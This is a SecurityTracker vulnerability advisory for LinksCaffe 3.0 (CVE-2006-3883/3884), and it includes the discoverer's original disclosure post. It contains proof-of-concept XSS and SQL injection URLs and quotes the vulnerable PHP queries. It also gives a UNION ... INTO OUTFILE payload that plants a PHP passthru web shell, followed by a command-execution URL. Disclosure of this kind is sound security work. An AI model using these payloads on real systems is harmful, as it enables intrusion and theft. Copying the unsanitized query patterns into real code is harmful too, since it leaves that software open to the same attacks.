Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
LinksCaffe Input Validation Holes Permits Cross-Site Scripting, SQL Injection, and Command Execution
|
|
SecurityTracker Alert ID: 1016584
|
|
SecurityTracker URL: http://securitytracker.com/id?1016584
|
|
CVE Reference: CVE-2006-3883
, CVE-2006-3884
(Links to External Site)
|
Updated: Jun 13 2008
|
Original Entry Date: Jul 26 2006
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 3.0
|
Description: Several vulnerabilities were reported in LinksCaffe. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running the LinksCaffe software and will run in the security context of that site.
As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with
the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the
target user.
Some demonstration exploit URLs are provided:
http://[target]/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+
http://[target]/linkscaffe/links.php?ac
tion=new&newdays=[XSS]
http://[target]/linkscaffe/menu.inc.php?tableborder='%3E[XSS]
http://[target]/linkscaffe/menu.inc.php?menucolor='%3E[XSS]
http://[target]/
linkscaffe/menu.inc.php?textcolor='%3E[XSS]
http://[target]/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]
A remote user can
also supply a specially crafted parameter value to execute SQL commands on the underlying database.
Some demonstration exploit
URLs are provided:
http://[target]/linkscaffe/links.php?cat=1&offset=[SQL]
http://[target]/linkscaffe/links.php?cat=1&limit=[SQL]
http://[target]/linkscaffe/link
s.php?action=new&newdays=[SQL]
http://[target]/linkscaffe/links.php?action=deadlink&link_id=[SQL]
If magic_quote_gpc is disabled,
a remote user can exploit 'links.php' with the following type of command to write shell commands to a writable file on the target
system:
http://[target]/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passthru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'
/usr/home/simo64/linkscaffe/pipo.php'/*
A remote user can also submit the following type of URL to cause the system to disclose
the installation path.
http://[target]/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*
Simo64 of Moroccan
Security Team discovered these vulnerabilities.
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
LinksCaffe software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
A remote user can execute SQL commands on the underlying database.
A remote user can determine the installation
path.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: gonafish.com/index.php?id=1 (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: simo64@gmail.com
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 25 Jul 2006 06:48:19 +0000
From: simo64@gmail.com
Subject: LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
|
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
Produce : LinksCaffe 3.0
Website : http://gonafish.com/
Impact : manupulation of data / system access
Discovered by : Simo64 - Moroccan Security Team
[+] SQL injection
******************
[1]Vulnerable code in line 223 in links.php
code :
$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER
BY hits DESC, link_pop DESC, rate
DESC LIMIT $offset, $limit") or die(mysql_error());
$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks
Exploit :
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]
[2] Vulnerable code in line 516 in links.php
code :
if (!$newdays)
{
$newdays=$daysnew;
}
else
{
$newdays=$newdays;
}
$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <
= $newdays AND link_val = 'yes'")
or die(mysql_error());
Exploit :
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]
[3] Vulnerable code in line 516 in links.php
code :
if ($action=="deadlink")
{
........
$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());
while($row = mysql_fetch_array($rime)) {
extract($row);
echo "<li><font class=text10><a href='$link_url' target='_blank'>$link_name<
/a><br>$link_desc<br></font></li>";
echo "<input type = 'hidden' name = 'link_id' value='$link_id'><input type = 'hidden'
name = 'cat_id' value='$cat_id'><input type
= 'hidden' name = 'link_name' value='$link_name'>
<input type = 'hidden' name = 'link_url' value='$link_url'><input type = 'hidden' name = 'l
ink_desc' value='$link_desc'><input type
= 'hidden' name = 'link_email' value='$link_email'><br><input type = 'submit' value = 'D
ead Link'>";
}
$link_id var are not sanitized before to be used to conducte sql injection attacks
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]
[+] FullPath disclosure :
PoC :
http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*
Result :
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links
.php on line 540
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links
.php on line 549
Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links
.php on line 554
[+] Remote Command Execution
*****************************
if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!
Exploit :
http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'<?passt
hru(\$_GET[\'cmd\']);?>',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.
php'/*
after we can exec cmds
http://localhost/linkscaffe/pipo.php?cmd=ls;id
[+] Cross Site Scripting
*************************
$tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks
$newdays var in links.php is not sanitized before to be used to conducte xss attacks
$tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used t
o conducte xss attacks
PoC :
http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS]<p+
http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]
http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]
http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]
Contact : simo64@gmail.com
greetz to all friends !
|
|
Go to the Top of This SecurityTracker Archive Page
|
